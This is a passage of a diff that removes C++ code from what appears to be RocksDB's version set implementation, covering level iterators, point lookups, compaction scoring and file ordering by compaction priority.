-  } else {
-    return est;
-  }
-}
-
-double VersionStorageInfo::GetEstimatedCompressionRatioAtLevel(
-    int level) const {
-  assert(level < num_levels_);
-  uint64_t sum_file_size_bytes = 0;
-  uint64_t sum_data_size_bytes = 0;
-  for (auto* file_meta : files_[level]) {
-    sum_file_size_bytes += file_meta->fd.GetFileSize();
-    sum_data_size_bytes += file_meta->raw_key_size + file_meta->raw_value_size;
-  }
-  if (sum_file_size_bytes == 0) {
-    return -1.0;
-  }
-  return static_cast<double>(sum_data_size_bytes) / sum_file_size_bytes;
-}
-
-void Version::AddIterators(const ReadOptions& read_options,
-                           const EnvOptions& soptions,
-                           MergeIteratorBuilder* merge_iter_builder,
-                           RangeDelAggregator* range_del_agg) {
-  assert(storage_info_.finalized_);
-
-  for (int level = 0; level < storage_info_.num_non_empty_levels(); level++) {
-    AddIteratorsForLevel(read_options, soptions, merge_iter_builder, level,
-                         range_del_agg);
-  }
-}
-
-void Version::AddIteratorsForLevel(const ReadOptions& read_options,
-                                   const EnvOptions& soptions,
-                                   MergeIteratorBuilder* merge_iter_builder,
-                                   int level,
-                                   RangeDelAggregator* range_del_agg) {
-  assert(storage_info_.finalized_);
-  if (level >= storage_info_.num_non_empty_levels()) {
-    // This is an empty level
-    return;
-  } else if (storage_info_.LevelFilesBrief(level).num_files == 0) {
-    // No files in this level
-    return;
-  }
-
-  bool should_sample = should_sample_file_read();
-
-  auto* arena = merge_iter_builder->GetArena();
-  if (level == 0) {
-    // Merge all level zero files together since they may overlap
-    for (size_t i = 0; i < storage_info_.LevelFilesBrief(0).num_files; i++) {
-      const auto& file = storage_info_.LevelFilesBrief(0).files[i];
-      merge_iter_builder->AddIterator(cfd_->table_cache()->NewIterator(
-          read_options, soptions, cfd_->internal_comparator(), file.fd,
-          range_del_agg, nullptr, cfd_->internal_stats()->GetFileReadHist(0),
-          false, arena, false /* skip_filters */, 0 /* level */));
-    }
-    if (should_sample) {
-      // Count ones for every L0 files. This is done per iterator creation
-      // rather than Seek(), while files in other levels are recored per seek.
-      // If users execute one range query per iterator, there may be some
-      // discrepancy here.
-      for (FileMetaData* meta : storage_info_.LevelFiles(0)) {
-        sample_file_read_inc(meta);
-      }
-    }
-  } else {
-    // For levels > 0, we can use a concatenating iterator that sequentially
-    // walks through the non-overlapping files in the level, opening them
-    // lazily.
-    auto* mem = arena->AllocateAligned(sizeof(LevelFileIteratorState));
-    auto* state = new (mem)
-        LevelFileIteratorState(cfd_->table_cache(), read_options, soptions,
-                               cfd_->internal_comparator(),
-                               cfd_->internal_stats()->GetFileReadHist(level),
-                               false /* for_compaction */,
-                               cfd_->ioptions()->prefix_extractor != nullptr,
-                               IsFilterSkipped(level), level, range_del_agg);
-    mem = arena->AllocateAligned(sizeof(LevelFileNumIterator));
-    auto* first_level_iter = new (mem) LevelFileNumIterator(
-        cfd_->internal_comparator(), &storage_info_.LevelFilesBrief(level),
-        should_sample_file_read());
-    merge_iter_builder->AddIterator(
-        NewTwoLevelIterator(state, first_level_iter, arena, false));
-  }
-}
-
-void Version::AddRangeDelIteratorsForLevel(
-    const ReadOptions& read_options, const EnvOptions& soptions, int level,
-    std::vector<InternalIterator*>* range_del_iters) {
-  range_del_iters->clear();
-  for (size_t i = 0; i < storage_info_.LevelFilesBrief(level).num_files; i++) {
-    const auto& file = storage_info_.LevelFilesBrief(level).files[i];
-    auto* range_del_iter = cfd_->table_cache()->NewRangeTombstoneIterator(
-        read_options, soptions, cfd_->internal_comparator(), file.fd,
-        cfd_->internal_stats()->GetFileReadHist(level),
-        false /* skip_filters */, level);
-    if (range_del_iter != nullptr) {
-      range_del_iters->push_back(range_del_iter);
-    }
-  }
-}
-
-VersionStorageInfo::VersionStorageInfo(
-    const InternalKeyComparator* internal_comparator,
-    const Comparator* user_comparator, int levels,
-    CompactionStyle compaction_style, VersionStorageInfo* ref_vstorage,
-    bool _force_consistency_checks)
-    : internal_comparator_(internal_comparator),
-      user_comparator_(user_comparator),
-      // cfd is nullptr if Version is dummy
-      num_levels_(levels),
-      num_non_empty_levels_(0),
-      file_indexer_(user_comparator),
-      compaction_style_(compaction_style),
-      files_(new std::vector<FileMetaData*>[num_levels_]),
-      base_level_(num_levels_ == 1 ? -1 : 1),
-      files_by_compaction_pri_(num_levels_),
-      level0_non_overlapping_(false),
-      next_file_to_compact_by_size_(num_levels_),
-      compaction_score_(num_levels_),
-      compaction_level_(num_levels_),
-      l0_delay_trigger_count_(0),
-      accumulated_file_size_(0),
-      accumulated_raw_key_size_(0),
-      accumulated_raw_value_size_(0),
-      accumulated_num_non_deletions_(0),
-      accumulated_num_deletions_(0),
-      current_num_non_deletions_(0),
-      current_num_deletions_(0),
-      current_num_samples_(0),
-      estimated_compaction_needed_bytes_(0),
-      finalized_(false),
-      force_consistency_checks_(_force_consistency_checks) {
-  if (ref_vstorage != nullptr) {
-    accumulated_file_size_ = ref_vstorage->accumulated_file_size_;
-    accumulated_raw_key_size_ = ref_vstorage->accumulated_raw_key_size_;
-    accumulated_raw_value_size_ = ref_vstorage->accumulated_raw_value_size_;
-    accumulated_num_non_deletions_ =
-        ref_vstorage->accumulated_num_non_deletions_;
-    accumulated_num_deletions_ = ref_vstorage->accumulated_num_deletions_;
-    current_num_non_deletions_ = ref_vstorage->current_num_non_deletions_;
-    current_num_deletions_ = ref_vstorage->current_num_deletions_;
-    current_num_samples_ = ref_vstorage->current_num_samples_;
-  }
-}
-
-Version::Version(ColumnFamilyData* column_family_data, VersionSet* vset,
-                 uint64_t version_number)
-    : env_(vset->env_),
-      cfd_(column_family_data),
-      info_log_((cfd_ == nullptr) ? nullptr : cfd_->ioptions()->info_log),
-      db_statistics_((cfd_ == nullptr) ? nullptr
-                                       : cfd_->ioptions()->statistics),
-      table_cache_((cfd_ == nullptr) ? nullptr : cfd_->table_cache()),
-      merge_operator_((cfd_ == nullptr) ? nullptr
-                                        : cfd_->ioptions()->merge_operator),
-      storage_info_(
-          (cfd_ == nullptr) ? nullptr : &cfd_->internal_comparator(),
-          (cfd_ == nullptr) ? nullptr : cfd_->user_comparator(),
-          cfd_ == nullptr ? 0 : cfd_->NumberLevels(),
-          cfd_ == nullptr ? kCompactionStyleLevel
-                          : cfd_->ioptions()->compaction_style,
-          (cfd_ == nullptr || cfd_->current() == nullptr)
-              ? nullptr
-              : cfd_->current()->storage_info(),
-          cfd_ == nullptr ? false : cfd_->ioptions()->force_consistency_checks),
-      vset_(vset),
-      next_(this),
-      prev_(this),
-      refs_(0),
-      version_number_(version_number) {}
-
-void Version::Get(const ReadOptions& read_options, const LookupKey& k,
-                  PinnableSlice* value, Status* status,
-                  MergeContext* merge_context,
-                  RangeDelAggregator* range_del_agg, bool* value_found,
-                  bool* key_exists, SequenceNumber* seq, bool* is_blob) {
-  Slice ikey = k.internal_key();
-  Slice user_key = k.user_key();
-
-  assert(status->ok() || status->IsMergeInProgress());
-
-  if (key_exists != nullptr) {
-    // will falsify below if not found
-    *key_exists = true;
-  }
-
-  PinnedIteratorsManager pinned_iters_mgr;
-  GetContext get_context(
-      user_comparator(), merge_operator_, info_log_, db_statistics_,
-      status->ok() ? GetContext::kNotFound : GetContext::kMerge, user_key,
-      value, value_found, merge_context, range_del_agg, this->env_, seq,
-      merge_operator_ ? &pinned_iters_mgr : nullptr, is_blob);
-
-  // Pin blocks that we read to hold merge operands
-  if (merge_operator_) {
-    pinned_iters_mgr.StartPinning();
-  }
-
-  FilePicker fp(
-      storage_info_.files_, user_key, ikey, &storage_info_.level_files_brief_,
-      storage_info_.num_non_empty_levels_, &storage_info_.file_indexer_,
-      user_comparator(), internal_comparator());
-  FdWithKeyRange* f = fp.GetNextFile();
-  while (f != nullptr) {
-    if (get_context.sample()) {
-      sample_file_read_inc(f->file_metadata);
-    }
-    *status = table_cache_->Get(
-        read_options, *internal_comparator(), f->fd, ikey, &get_context,
-        cfd_->internal_stats()->GetFileReadHist(fp.GetHitFileLevel()),
-        IsFilterSkipped(static_cast<int>(fp.GetHitFileLevel()),
-                        fp.IsHitFileLastInLevel()),
-        fp.GetCurrentLevel());
-    // TODO: examine the behavior for corrupted key
-    if (!status->ok()) {
-      return;
-    }
-
-    switch (get_context.State()) {
-      case GetContext::kNotFound:
-        // Keep searching in other files
-        break;
-      case GetContext::kFound:
-        if (fp.GetHitFileLevel() == 0) {
-          RecordTick(db_statistics_, GET_HIT_L0);
-        } else if (fp.GetHitFileLevel() == 1) {
-          RecordTick(db_statistics_, GET_HIT_L1);
-        } else if (fp.GetHitFileLevel() >= 2) {
-          RecordTick(db_statistics_, GET_HIT_L2_AND_UP);
-        }
-        return;
-      case GetContext::kDeleted:
-        // Use empty error message for speed
-        *status = Status::NotFound();
-        return;
-      case GetContext::kCorrupt:
-        *status = Status::Corruption("corrupted key for ", user_key);
-        return;
-      case GetContext::kMerge:
-        break;
-      case GetContext::kBlobIndex:
-        ROCKS_LOG_ERROR(info_log_, "Encounter unexpected blob index.");
-        *status = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-        return;
-    }
-    f = fp.GetNextFile();
-  }
-
-  if (GetContext::kMerge == get_context.State()) {
-    if (!merge_operator_) {
-      *status =  Status::InvalidArgument(
-          "merge_operator is not properly initialized.");
-      return;
-    }
-    // merge_operands are in saver and we hit the beginning of the key history
-    // do a final merge of nullptr and operands;
-    std::string* str_value = value != nullptr ? value->GetSelf() : nullptr;
-    *status = MergeHelper::TimedFullMerge(
-        merge_operator_, user_key, nullptr, merge_context->GetOperands(),
-        str_value, info_log_, db_statistics_, env_,
-        nullptr /* result_operand */, true);
-    if (LIKELY(value != nullptr)) {
-      value->PinSelf();
-    }
-  } else {
-    if (key_exists != nullptr) {
-      *key_exists = false;
-    }
-    *status = Status::NotFound(); // Use an empty error message for speed
-  }
-}
-
-bool Version::IsFilterSkipped(int level, bool is_file_last_in_level) {
-  // Reaching the bottom level implies misses at all upper levels, so we'll
-  // skip checking the filters when we predict a hit.
-  return cfd_->ioptions()->optimize_filters_for_hits &&
-         (level > 0 || is_file_last_in_level) &&
-         level == storage_info_.num_non_empty_levels() - 1;
-}
-
-void VersionStorageInfo::GenerateLevelFilesBrief() {
-  level_files_brief_.resize(num_non_empty_levels_);
-  for (int level = 0; level < num_non_empty_levels_; level++) {
-    DoGenerateLevelFilesBrief(
-        &level_files_brief_[level], files_[level], &arena_);
-  }
-}
-
-void Version::PrepareApply(
-    const MutableCFOptions& mutable_cf_options,
-    bool update_stats) {
-  UpdateAccumulatedStats(update_stats);
-  storage_info_.UpdateNumNonEmptyLevels();
-  storage_info_.CalculateBaseBytes(*cfd_->ioptions(), mutable_cf_options);
-  storage_info_.UpdateFilesByCompactionPri(cfd_->ioptions()->compaction_pri);
-  storage_info_.GenerateFileIndexer();
-  storage_info_.GenerateLevelFilesBrief();
-  storage_info_.GenerateLevel0NonOverlapping();
-}
-
-bool Version::MaybeInitializeFileMetaData(FileMetaData* file_meta) {
-  if (file_meta->init_stats_from_file ||
-      file_meta->compensated_file_size > 0) {
-    return false;
-  }
-  std::shared_ptr<const TableProperties> tp;
-  Status s = GetTableProperties(&tp, file_meta);
-  file_meta->init_stats_from_file = true;
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(vset_->db_options_->info_log,
-                    "Unable to load table properties for file %" PRIu64
-                    " --- %s\n",
-                    file_meta->fd.GetNumber(), s.ToString().c_str());
-    return false;
-  }
-  if (tp.get() == nullptr) return false;
-  file_meta->num_entries = tp->num_entries;
-  file_meta->num_deletions = GetDeletedKeys(tp->user_collected_properties);
-  file_meta->raw_value_size = tp->raw_value_size;
-  file_meta->raw_key_size = tp->raw_key_size;
-
-  return true;
-}
-
-void VersionStorageInfo::UpdateAccumulatedStats(FileMetaData* file_meta) {
-  assert(file_meta->init_stats_from_file);
-  accumulated_file_size_ += file_meta->fd.GetFileSize();
-  accumulated_raw_key_size_ += file_meta->raw_key_size;
-  accumulated_raw_value_size_ += file_meta->raw_value_size;
-  accumulated_num_non_deletions_ +=
-      file_meta->num_entries - file_meta->num_deletions;
-  accumulated_num_deletions_ += file_meta->num_deletions;
-
-  current_num_non_deletions_ +=
-      file_meta->num_entries - file_meta->num_deletions;
-  current_num_deletions_ += file_meta->num_deletions;
-  current_num_samples_++;
-}
-
-void VersionStorageInfo::RemoveCurrentStats(FileMetaData* file_meta) {
-  if (file_meta->init_stats_from_file) {
-    current_num_non_deletions_ -=
-        file_meta->num_entries - file_meta->num_deletions;
-    current_num_deletions_ -= file_meta->num_deletions;
-    current_num_samples_--;
-  }
-}
-
-void Version::UpdateAccumulatedStats(bool update_stats) {
-  if (update_stats) {
-    // maximum number of table properties loaded from files.
-    const int kMaxInitCount = 20;
-    int init_count = 0;
-    // here only the first kMaxInitCount files which haven't been
-    // initialized from file will be updated with num_deletions.
-    // The motivation here is to cap the maximum I/O per Version creation.
-    // The reason for choosing files from lower-level instead of higher-level
-    // is that such design is able to propagate the initialization from
-    // lower-level to higher-level:  When the num_deletions of lower-level
-    // files are updated, it will make the lower-level files have accurate
-    // compensated_file_size, making lower-level to higher-level compaction
-    // will be triggered, which creates higher-level files whose num_deletions
-    // will be updated here.
-    for (int level = 0;
-         level < storage_info_.num_levels_ && init_count < kMaxInitCount;
-         ++level) {
-      for (auto* file_meta : storage_info_.files_[level]) {
-        if (MaybeInitializeFileMetaData(file_meta)) {
-          // each FileMeta will be initialized only once.
-          storage_info_.UpdateAccumulatedStats(file_meta);
-          // when option "max_open_files" is -1, all the file metadata has
-          // already been read, so MaybeInitializeFileMetaData() won't incur
-          // any I/O cost. "max_open_files=-1" means that the table cache passed
-          // to the VersionSet and then to the ColumnFamilySet has a size of
-          // TableCache::kInfiniteCapacity
-          if (vset_->GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-              TableCache::kInfiniteCapacity) {
-            continue;
-          }
-          if (++init_count >= kMaxInitCount) {
-            break;
-          }
-        }
-      }
-    }
-    // In case all sampled-files contain only deletion entries, then we
-    // load the table-property of a file in higher-level to initialize
-    // that value.
-    for (int level = storage_info_.num_levels_ - 1;
-         storage_info_.accumulated_raw_value_size_ == 0 && level >= 0;
-         --level) {
-      for (int i = static_cast<int>(storage_info_.files_[level].size()) - 1;
-           storage_info_.accumulated_raw_value_size_ == 0 && i >= 0; --i) {
-        if (MaybeInitializeFileMetaData(storage_info_.files_[level][i])) {
-          storage_info_.UpdateAccumulatedStats(storage_info_.files_[level][i]);
-        }
-      }
-    }
-  }
-
-  storage_info_.ComputeCompensatedSizes();
-}
-
-void VersionStorageInfo::ComputeCompensatedSizes() {
-  static const int kDeletionWeightOnCompaction = 2;
-  uint64_t average_value_size = GetAverageValueSize();
-
-  // compute the compensated size
-  for (int level = 0; level < num_levels_; level++) {
-    for (auto* file_meta : files_[level]) {
-      // Here we only compute compensated_file_size for those file_meta
-      // which compensated_file_size is uninitialized (== 0). This is true only
-      // for files that have been created right now and no other thread has
-      // access to them. That's why we can safely mutate compensated_file_size.
-      if (file_meta->compensated_file_size == 0) {
-        file_meta->compensated_file_size = file_meta->fd.GetFileSize();
-        // Here we only boost the size of deletion entries of a file only
-        // when the number of deletion entries is greater than the number of
-        // non-deletion entries in the file.  The motivation here is that in
-        // a stable workload, the number of deletion entries should be roughly
-        // equal to the number of non-deletion entries.  If we compensate the
-        // size of deletion entries in a stable workload, the deletion
-        // compensation logic might introduce unwanted effet which changes the
-        // shape of LSM tree.
-        if (file_meta->num_deletions * 2 >= file_meta->num_entries) {
-          file_meta->compensated_file_size +=
-              (file_meta->num_deletions * 2 - file_meta->num_entries) *
-              average_value_size * kDeletionWeightOnCompaction;
-        }
-      }
-    }
-  }
-}
-
-int VersionStorageInfo::MaxInputLevel() const {
-  if (compaction_style_ == kCompactionStyleLevel) {
-    return num_levels() - 2;
-  }
-  return 0;
-}
-
-int VersionStorageInfo::MaxOutputLevel(bool allow_ingest_behind) const {
-  if (allow_ingest_behind) {
-    assert(num_levels() > 1);
-    return num_levels() - 2;
-  }
-  return num_levels() - 1;
-}
-
-void VersionStorageInfo::EstimateCompactionBytesNeeded(
-    const MutableCFOptions& mutable_cf_options) {
-  // Only implemented for level-based compaction
-  if (compaction_style_ != kCompactionStyleLevel) {
-    estimated_compaction_needed_bytes_ = 0;
-    return;
-  }
-
-  // Start from Level 0, if level 0 qualifies compaction to level 1,
-  // we estimate the size of compaction.
-  // Then we move on to the next level and see whether it qualifies compaction
-  // to the next level. The size of the level is estimated as the actual size
-  // on the level plus the input bytes from the previous level if there is any.
-  // If it exceeds, take the exceeded bytes as compaction input and add the size
-  // of the compaction size to tatal size.
-  // We keep doing it to Level 2, 3, etc, until the last level and return the
-  // accumulated bytes.
-
-  uint64_t bytes_compact_to_next_level = 0;
-  uint64_t level_size = 0;
-  for (auto* f : files_[0]) {
-    level_size += f->fd.GetFileSize();
-  }
-  // Level 0
-  bool level0_compact_triggered = false;
-  if (static_cast<int>(files_[0].size()) >=
-          mutable_cf_options.level0_file_num_compaction_trigger ||
-      level_size >= mutable_cf_options.max_bytes_for_level_base) {
-    level0_compact_triggered = true;
-    estimated_compaction_needed_bytes_ = level_size;
-    bytes_compact_to_next_level = level_size;
-  } else {
-    estimated_compaction_needed_bytes_ = 0;
-  }
-
-  // Level 1 and up.
-  uint64_t bytes_next_level = 0;
-  for (int level = base_level(); level <= MaxInputLevel(); level++) {
-    level_size = 0;
-    if (bytes_next_level > 0) {
-#ifndef NDEBUG
-      uint64_t level_size2 = 0;
-      for (auto* f : files_[level]) {
-        level_size2 += f->fd.GetFileSize();
-      }
-      assert(level_size2 == bytes_next_level);
-#endif
-      level_size = bytes_next_level;
-      bytes_next_level = 0;
-    } else {
-      for (auto* f : files_[level]) {
-        level_size += f->fd.GetFileSize();
-      }
-    }
-    if (level == base_level() && level0_compact_triggered) {
-      // Add base level size to compaction if level0 compaction triggered.
-      estimated_compaction_needed_bytes_ += level_size;
-    }
-    // Add size added by previous compaction
-    level_size += bytes_compact_to_next_level;
-    bytes_compact_to_next_level = 0;
-    uint64_t level_target = MaxBytesForLevel(level);
-    if (level_size > level_target) {
-      bytes_compact_to_next_level = level_size - level_target;
-      // Estimate the actual compaction fan-out ratio as size ratio between
-      // the two levels.
-
-      assert(bytes_next_level == 0);
-      if (level + 1 < num_levels_) {
-        for (auto* f : files_[level + 1]) {
-          bytes_next_level += f->fd.GetFileSize();
-        }
-      }
-      if (bytes_next_level > 0) {
-        assert(level_size > 0);
-        estimated_compaction_needed_bytes_ += static_cast<uint64_t>(
-            static_cast<double>(bytes_compact_to_next_level) *
-            (static_cast<double>(bytes_next_level) /
-                 static_cast<double>(level_size) +
-             1));
-      }
-    }
-  }
-}
-
-namespace {
-uint32_t GetExpiredTtlFilesCount(const ImmutableCFOptions& ioptions,
-                                 const std::vector<FileMetaData*>& files) {
-  uint32_t ttl_expired_files_count = 0;
-
-  int64_t _current_time;
-  auto status = ioptions.env->GetCurrentTime(&_current_time);
-  if (status.ok()) {
-    const uint64_t current_time = static_cast<uint64_t>(_current_time);
-    for (auto f : files) {
-      if (!f->being_compacted && f->fd.table_reader != nullptr &&
-          f->fd.table_reader->GetTableProperties() != nullptr) {
-        auto creation_time =
-            f->fd.table_reader->GetTableProperties()->creation_time;
-        if (creation_time > 0 &&
-            creation_time <
-                (current_time - ioptions.compaction_options_fifo.ttl)) {
-          ttl_expired_files_count++;
-        }
-      }
-    }
-  }
-  return ttl_expired_files_count;
-}
-}  // anonymous namespace
-
-void VersionStorageInfo::ComputeCompactionScore(
-    const ImmutableCFOptions& immutable_cf_options,
-    const MutableCFOptions& mutable_cf_options) {
-  for (int level = 0; level <= MaxInputLevel(); level++) {
-    double score;
-    if (level == 0) {
-      // We treat level-0 specially by bounding the number of files
-      // instead of number of bytes for two reasons:
-      //
-      // (1) With larger write-buffer sizes, it is nice not to do too
-      // many level-0 compactions.
-      //
-      // (2) The files in level-0 are merged on every read and
-      // therefore we wish to avoid too many files when the individual
-      // file size is small (perhaps because of a small write-buffer
-      // setting, or very high compression ratios, or lots of
-      // overwrites/deletions).
-      int num_sorted_runs = 0;
-      uint64_t total_size = 0;
-      for (auto* f : files_[level]) {
-        if (!f->being_compacted) {
-          total_size += f->compensated_file_size;
-          num_sorted_runs++;
-        }
-      }
-      if (compaction_style_ == kCompactionStyleUniversal) {
-        // For universal compaction, we use level0 score to indicate
-        // compaction score for the whole DB. Adding other levels as if
-        // they are L0 files.
-        for (int i = 1; i < num_levels(); i++) {
-          if (!files_[i].empty() && !files_[i][0]->being_compacted) {
-            num_sorted_runs++;
-          }
-        }
-      }
-
-      if (compaction_style_ == kCompactionStyleFIFO) {
-        score =
-            static_cast<double>(total_size) /
-            immutable_cf_options.compaction_options_fifo.max_table_files_size;
-        if (immutable_cf_options.compaction_options_fifo.allow_compaction) {
-          score = std::max(
-              static_cast<double>(num_sorted_runs) /
-                  mutable_cf_options.level0_file_num_compaction_trigger,
-              score);
-        }
-        if (immutable_cf_options.compaction_options_fifo.ttl > 0) {
-          score = std::max(static_cast<double>(GetExpiredTtlFilesCount(
-                               immutable_cf_options, files_[level])),
-                           score);
-        }
-
-      } else {
-        score = static_cast<double>(num_sorted_runs) /
-                mutable_cf_options.level0_file_num_compaction_trigger;
-        if (compaction_style_ == kCompactionStyleLevel && num_levels() > 1) {
-          // Level-based involves L0->L0 compactions that can lead to oversized
-          // L0 files. Take into account size as well to avoid later giant
-          // compactions to the base level.
-          score = std::max(
-              score, static_cast<double>(total_size) /
-                     mutable_cf_options.max_bytes_for_level_base);
-        }
-      }
-    } else {
-      // Compute the ratio of current size to size limit.
-      uint64_t level_bytes_no_compacting = 0;
-      for (auto f : files_[level]) {
-        if (!f->being_compacted) {
-          level_bytes_no_compacting += f->compensated_file_size;
-        }
-      }
-      score = static_cast<double>(level_bytes_no_compacting) /
-              MaxBytesForLevel(level);
-    }
-    compaction_level_[level] = level;
-    compaction_score_[level] = score;
-  }
-
-  // sort all the levels based on their score. Higher scores get listed
-  // first. Use bubble sort because the number of entries are small.
-  for (int i = 0; i < num_levels() - 2; i++) {
-    for (int j = i + 1; j < num_levels() - 1; j++) {
-      if (compaction_score_[i] < compaction_score_[j]) {
-        double score = compaction_score_[i];
-        int level = compaction_level_[i];
-        compaction_score_[i] = compaction_score_[j];
-        compaction_level_[i] = compaction_level_[j];
-        compaction_score_[j] = score;
-        compaction_level_[j] = level;
-      }
-    }
-  }
-  ComputeFilesMarkedForCompaction();
-  EstimateCompactionBytesNeeded(mutable_cf_options);
-}
-
-void VersionStorageInfo::ComputeFilesMarkedForCompaction() {
-  files_marked_for_compaction_.clear();
-  int last_qualify_level = 0;
-
-  // Do not include files from the last level with data
-  // If table properties collector suggests a file on the last level,
-  // we should not move it to a new level.
-  for (int level = num_levels() - 1; level >= 1; level--) {
-    if (!files_[level].empty()) {
-      last_qualify_level = level - 1;
-      break;
-    }
-  }
-
-  for (int level = 0; level <= last_qualify_level; level++) {
-    for (auto* f : files_[level]) {
-      if (!f->being_compacted && f->marked_for_compaction) {
-        files_marked_for_compaction_.emplace_back(level, f);
-      }
-    }
-  }
-}
-
-namespace {
-
-// used to sort files by size
-struct Fsize {
-  size_t index;
-  FileMetaData* file;
-};
-
-// Compator that is used to sort files based on their size
-// In normal mode: descending size
-bool CompareCompensatedSizeDescending(const Fsize& first, const Fsize& second) {
-  return (first.file->compensated_file_size >
-      second.file->compensated_file_size);
-}
-} // anonymous namespace
-
-void VersionStorageInfo::AddFile(int level, FileMetaData* f, Logger* info_log) {
-  auto* level_files = &files_[level];
-  // Must not overlap
-#ifndef NDEBUG
-  if (level > 0 && !level_files->empty() &&
-      internal_comparator_->Compare(
-          (*level_files)[level_files->size() - 1]->largest, f->smallest) >= 0) {
-    auto* f2 = (*level_files)[level_files->size() - 1];
-    if (info_log != nullptr) {
-      Error(info_log, "Adding new file %" PRIu64
-                      " range (%s, %s) to level %d but overlapping "
-                      "with existing file %" PRIu64 " %s %s",
-            f->fd.GetNumber(), f->smallest.DebugString(true).c_str(),
-            f->largest.DebugString(true).c_str(), level, f2->fd.GetNumber(),
-            f2->smallest.DebugString(true).c_str(),
-            f2->largest.DebugString(true).c_str());
-      LogFlush(info_log);
-    }
-    assert(false);
-  }
-#endif
-  f->refs++;
-  level_files->push_back(f);
-}
-
-// Version::PrepareApply() need to be called before calling the function, or
-// following functions called:
-// 1. UpdateNumNonEmptyLevels();
-// 2. CalculateBaseBytes();
-// 3. UpdateFilesByCompactionPri();
-// 4. GenerateFileIndexer();
-// 5. GenerateLevelFilesBrief();
-// 6. GenerateLevel0NonOverlapping();
-void VersionStorageInfo::SetFinalized() {
-  finalized_ = true;
-#ifndef NDEBUG
-  if (compaction_style_ != kCompactionStyleLevel) {
-    // Not level based compaction.
-    return;
-  }
-  assert(base_level_ < 0 || num_levels() == 1 ||
-         (base_level_ >= 1 && base_level_ < num_levels()));
-  // Verify all levels newer than base_level are empty except L0
-  for (int level = 1; level < base_level(); level++) {
-    assert(NumLevelBytes(level) == 0);
-  }
-  uint64_t max_bytes_prev_level = 0;
-  for (int level = base_level(); level < num_levels() - 1; level++) {
-    if (LevelFiles(level).size() == 0) {
-      continue;
-    }
-    assert(MaxBytesForLevel(level) >= max_bytes_prev_level);
-    max_bytes_prev_level = MaxBytesForLevel(level);
-  }
-  int num_empty_non_l0_level = 0;
-  for (int level = 0; level < num_levels(); level++) {
-    assert(LevelFiles(level).size() == 0 ||
-           LevelFiles(level).size() == LevelFilesBrief(level).num_files);
-    if (level > 0 && NumLevelBytes(level) > 0) {
-      num_empty_non_l0_level++;
-    }
-    if (LevelFiles(level).size() > 0) {
-      assert(level < num_non_empty_levels());
-    }
-  }
-  assert(compaction_level_.size() > 0);
-  assert(compaction_level_.size() == compaction_score_.size());
-#endif
-}
-
-void VersionStorageInfo::UpdateNumNonEmptyLevels() {
-  num_non_empty_levels_ = num_levels_;
-  for (int i = num_levels_ - 1; i >= 0; i--) {
-    if (files_[i].size() != 0) {
-      return;
-    } else {
-      num_non_empty_levels_ = i;
-    }
-  }
-}
-
-namespace {
-// Sort `temp` based on ratio of overlapping size over file size
-void SortFileByOverlappingRatio(
-    const InternalKeyComparator& icmp, const std::vector<FileMetaData*>& files,
-    const std::vector<FileMetaData*>& next_level_files,
-    std::vector<Fsize>* temp) {
-  std::unordered_map<uint64_t, uint64_t> file_to_order;
-  auto next_level_it = next_level_files.begin();
-
-  for (auto& file : files) {
-    uint64_t overlapping_bytes = 0;
-    // Skip files in next level that is smaller than current file
-    while (next_level_it != next_level_files.end() &&
-           icmp.Compare((*next_level_it)->largest, file->smallest) < 0) {
-      next_level_it++;
-    }
-
-    while (next_level_it != next_level_files.end() &&
-           icmp.Compare((*next_level_it)->smallest, file->largest) < 0) {
-      overlapping_bytes += (*next_level_it)->fd.file_size;
-
-      if (icmp.Compare((*next_level_it)->largest, file->largest) > 0) {
-        // next level file cross large boundary of current file.
-        break;
-      }
-      next_level_it++;
-    }
-
-    assert(file->fd.file_size != 0);
-    file_to_order[file->fd.GetNumber()] =
-        overlapping_bytes * 1024u / file->fd.file_size;
-  }
-
-  std::sort(temp->begin(), temp->end(),
-            [&](const Fsize& f1, const Fsize& f2) -> bool {
-              return file_to_order[f1.file->fd.GetNumber()] <
-                     file_to_order[f2.file->fd.GetNumber()];
-            });
-}
-}  // namespace
-
-void VersionStorageInfo::UpdateFilesByCompactionPri(
-    CompactionPri compaction_pri) {
-  if (compaction_style_ == kCompactionStyleFIFO ||
-      compaction_style_ == kCompactionStyleUniversal) {
-    // don't need this
-    return;
-  }
-  // No need to sort the highest level because it is never compacted.
-  for (int level = 0; level < num_levels() - 1; level++) {
-    const std::vector<FileMetaData*>& files = files_[level];
-    auto& files_by_compaction_pri = files_by_compaction_pri_[level];
-    assert(files_by_compaction_pri.size() == 0);
-
-    // populate a temp vector for sorting based on size
-    std::vector<Fsize> temp(files.size());
-    for (size_t i = 0; i < files.size(); i++) {
-      temp[i].index = i;
-      temp[i].file = files[i];
-    }
-
-    // sort the top number_of_files_to_sort_ based on file size
-    size_t num = VersionStorageInfo::kNumberFilesToSort;
-    if (num > temp.size()) {
-      num = temp.size();
-    }
-    switch (compaction_pri) {
-      case kByCompensatedSize:
-        std::partial_sort(temp.begin(), temp.begin() + num, temp.end(),
-                          CompareCompensatedSizeDescending);
-        break;
-      case kOldestLargestSeqFirst:
-        std::sort(temp.begin(), temp.end(),
-                  [](const Fsize& f1, const Fsize& f2) -> bool {
-                    return f1.file->largest_seqno < f2.file->largest_seqno;
-                  });
-        break;
-      case kOldestSmallestSeqFirst:
-        std::sort(temp.begin(), temp.end(),
-                  [](const Fsize& f1, const Fsize& f2) -> bool {
-                    return f1.file->smallest_seqno < f2.file->smallest_seqno;
-                  });
-        break;
-      case kMinOverlappingRatio:
-        SortFileByOverlappingRatio(*internal_comparator_, files_[level],
-                                   files_[level + 1], &temp);
-        break;
-      default:
-        assert(false);
-    }
-    assert(temp.size() == files.size());
-
-    // initialize files_by_compaction_pri_
-    for (size_t i = 0; i < temp.size(); i++) {
-      files_by_compaction_pri.push_back(static_cast<int>(temp[i].index));
-    }
-    next_file_to_compact_by_size_[level] = 0;
-    assert(files_[level].size() == files_by_compaction_pri_[level].size());
-  }
-}
-
-void VersionStorageInfo::GenerateLevel0NonOverlapping() {
-  assert(!finalized_);
-  level0_non_overlapping_ = true;
-  if (level_files_brief_.size() == 0) {
-    return;
-  }
-
-  // A copy of L0 files sorted by smallest key
-  std::vector<FdWithKeyRange> level0_sorted_file(
-      level_files_brief_[0].files,
-      level_files_brief_[0].files + level_files_brief_[0].num_files);
-  std::sort(level0_sorted_file.begin(), level0_sorted_file.end(),
